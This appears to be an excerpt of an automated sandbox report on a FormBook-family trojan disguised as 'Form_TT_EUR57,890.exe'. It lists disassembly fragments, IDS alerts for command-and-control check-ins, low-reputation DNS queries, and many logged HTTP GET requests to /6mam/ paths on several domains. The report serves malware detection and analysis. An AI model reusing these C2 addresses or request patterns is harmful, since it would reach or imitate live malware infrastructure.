          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199ECh]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebx]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov edx, dword ptr [eax]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov ebx, dword ptr [ecx]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor ecx, ecx
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 00000080h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 02h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 01h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then lea edx, dword ptr [ebp-08h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 15000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199ECh]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebx]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199ECh]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [00419A0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebx]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 15000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov edx, dword ptr [eax]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov ebx, dword ptr [ecx]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-0Ch]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp+08h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor ecx, ecx
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 00000080h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then test eax, 80000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 02h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then or edx, 01h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [ebp-04h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then lea edx, dword ptr [ebp-08h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [edi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199DCh]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000004h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199D4h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [esi]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C0h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 00000000h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then mov eax, dword ptr [004199C8h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then push 004199E0h
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 4x nop then xor eax, eax
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49765 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49771 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49772 -> 23.27.129.115:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49774 -> 86.105.245.69:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49775 -> 35.186.238.101:80
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exeDNS query: www.f9fui8.xyz
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.mobiessence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.trendyheld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.beastninjas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.importexportasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.kilbyrnefarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.dragonshipping.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.mylifeinpark.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.delhibudokankarate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=L6FmBYjymbItbbnnjd7yzq8hOevfuspHLpHNfkA4yzrvipy3lucWli1gmvwrFafR77bKFMYeeA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.vavasoo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=44unMI1Q/kB3N4iH8WCIjTNIPpmavX0UQR770OieCBmDyTCieL+ZZdhYfwuEfVyDA+gWGsSDYQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.schoolfrontoffice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=U4etKMGlduRHKY34/y2VHJ3U/bl1CG9JeeGxs20P+eoGUQdkn77fFsSN2SlAgFKwyO8ri7IQTA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.mypursuitpodcast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.besport24.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.mobiessence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.trendyheld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.beastninjas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.importexportasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.kilbyrnefarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.dragonshipping.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.mylifeinpark.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.delhibudokankarate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.mobiessence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.trendyheld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.beastninjas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.importexportasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.kilbyrnefarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.dragonshipping.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.mylifeinpark.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.delhibudokankarate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=L6FmBYjymbItbbnnjd7yzq8hOevfuspHLpHNfkA4yzrvipy3lucWli1gmvwrFafR77bKFMYeeA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.vavasoo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=44unMI1Q/kB3N4iH8WCIjTNIPpmavX0UQR770OieCBmDyTCieL+ZZdhYfwuEfVyDA+gWGsSDYQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.schoolfrontoffice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=U4etKMGlduRHKY34/y2VHJ3U/bl1CG9JeeGxs20P+eoGUQdkn77fFsSN2SlAgFKwyO8ri7IQTA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.mypursuitpodcast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=G66iPt+zysOdT87cMSNY3jIG1auw/RAx4PjK5prA1jAGCtavWTKfmUTffyE+Nzacke4pg1lsTg==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.besport24.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=KE8gpfUEuqRqMBWGFV5goIwNmc44LE6Oi+PTcRo4vEp3RirjZlcD1GLbPH2NA5fTW+Y3K/xiNw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.mobiessence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=E0pe+Y2tlTeS/nkCAz5H/oSd7jolrcEyLM5+sA5RPKgWYHOxmsRP4IrVmGJTeseGmyQ7XT1Vgg==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.trendyheld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=oQhTdcG1kNI9/Lmcc2Ae/5c2EVHHJUmgpucHXQ4UdnJs0zjkXV1wGSuIEzpJIo84TCfrKzWPPA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.beastninjas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=2ekFb54j3d1mky1ioMZXLX6Zs25on60VYd2MbHSx0a3rFw0M4/d2RTsPPkjiG9H4TZ6139bXkw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.importexportasia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=YkvzQHb0u0mjzgqcdkfc2nlAC0Yzm929bCO8fEJzAgzkJ6Iw6dVqaRJYZU+TtwSY8fdaCDocnA==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.kilbyrnefarm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=5npnSCZ0ck9LfxTaUtRZHwWauGngCjsEHbJTec35d6ZUl1gSnMY6WOunSeDfnMtC3HJRIA/gUg==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.dragonshipping.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=djxA7LmI8yOR5lrxItMqg4jKcWhO49sHA38/CyXgFoUCakRbVREb3j6xA5Z01WfJADXfd3zybw==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.mylifeinpark.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /6mam/?wbYpSP=Dhv3NEq4M+QwROw+dIik/SqBuvIY1/ydOcQwMfpHsV2StOMLf1p+AXWBQfK1e2Gy8MhXWnKhDQ==&PJEt=HRR0_XgHGBD8 HTTP/1.1Host: www.delhibudokankarate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: onedrive.live.com
          Source: Form_TT_EUR57,890.exe, 00000001.00000003.341319212.00000000007A2000.00000004.00000001.sdmp, Fdhlajk.exe, 00000010.00000003.400962283.00000000008A4000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: explorer.exe, 00000008.00000000.418360546.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Form_TT_EUR57,890.exe, 00000001.00000003.341319212.00000000007A2000.00000004.00000001.sdmp, Fdhlajk.exe, 00000010.00000003.400962283.00000000008A4000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
